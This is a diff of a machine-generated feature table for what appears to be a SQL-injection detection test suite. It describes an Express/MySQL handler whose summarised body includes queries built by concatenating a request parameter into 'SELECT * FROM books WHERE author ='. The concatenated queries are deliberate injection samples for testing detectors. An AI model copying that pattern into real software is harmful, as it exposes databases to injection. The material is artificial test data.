autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:15 | sql | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:15 | sql | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:15 | sql | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:59 | sql: 'S ... r` = ?' | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:18:9:59 | 'SELECT ... r` = ?' | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:18:9:59 | 'SELECT ... r` = ?' | InputAccessPathFromCallee | 0.sql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:18:9:59 | 'SELECT ... r` = ?' | InputArgumentIndex | 0 | @@ -3353,6 +16407,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:18:9:59 | 'SELECT ... r` = ?' | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:18:9:59 | 'SELECT ... r` = ?' | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:18:9:59 | 'SELECT ... r` = ?' | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:18 | values | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:18 | values | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:18 | values | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:18 | values | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:18 | values | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:13:10:26 | values: [temp] | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:21:10:26 | [temp] | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:21:10:26 | [temp] | InputAccessPathFromCallee | 0.values | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:21:10:26 | [temp] | InputArgumentIndex | 0 | @@ -3363,10 +16432,30 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:21:10:26 | [temp] | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:21:10:26 | [temp] | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:10:22:10:25 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:11 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:11 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:11 | this | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:11 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:11 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | 'arguments' object of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | 'arguments' object of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | exceptional return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | exceptional return of anonymous function | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | functio ... lds) {} | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | functio ... lds) {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | functio ... lds) {} | contextFunctionInterfaces | handler(req, res) | @@ -3375,6 +16464,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | functio ... lds) {} | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | functio ... lds) {} | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | functio ... lds) {} | receiverName | connection | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:12:11:46 | return of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:21:11:25 | error | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:21:11:25 | error | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:21:11:25 | error | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:21:11:25 | error | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:21:11:25 | error | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:28:11:34 | results | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:28:11:34 | results | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:28:11:34 | results | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:28:11:34 | results | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:28:11:34 | results | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:37:11:42 | fields | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:37:11:42 | fields | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:37:11:42 | fields | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:37:11:42 | fields | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:11:37:11:42 | fields | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:8 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:8 | pool | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:8 | pool | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:8 | pool | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:8 | pool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:22 | pool.getConnection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:22 | pool.getConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:22 | pool.getConnection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:22 | pool.getConnection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:13:22 | pool.getConnection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | exceptional return of pool.ge ... \\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | exceptional return of pool.ge ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | exceptional return of pool.ge ... \\n }) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | exceptional return of pool.ge ... \\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | exceptional return of pool.ge ... \\n }) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | pool.ge ... \\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | pool.ge ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | pool.ge ... \\n }) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | pool.ge ... \\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:5:17:6 | pool.ge ... \\n }) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:10:13:22 | getConnection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:10:13:22 | getConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:10:13:22 | getConnection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:10:13:22 | getConnection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:10:13:22 | getConnection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | this | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:13:23 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | 'arguments' object of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | exceptional return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | exceptional return of anonymous function | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | pool.getConnection | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | functio ... ;\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | functio ... ;\\n } | calleeImports | mysql | @@ -3384,6 +16538,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | functio ... ;\\n } | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | functio ... ;\\n } | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | functio ... ;\\n } | receiverName | pool | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:24:17:5 | return of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:33:13:35 | err | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:33:13:35 | err | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:33:13:35 | err | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:33:13:35 | err | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:33:13:35 | err | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:13:38:13:47 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:18 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:18 | connection | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:18 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:18 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:18 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:24 | connection.query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:24 | connection.query | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:24 | connection.query | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:24 | connection.query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:14:24 | connection.query | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | connect ... ds) {}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | connect ... ds) {}) | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | connect ... ds) {}) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:14:9:16:47 | connect ... ds) 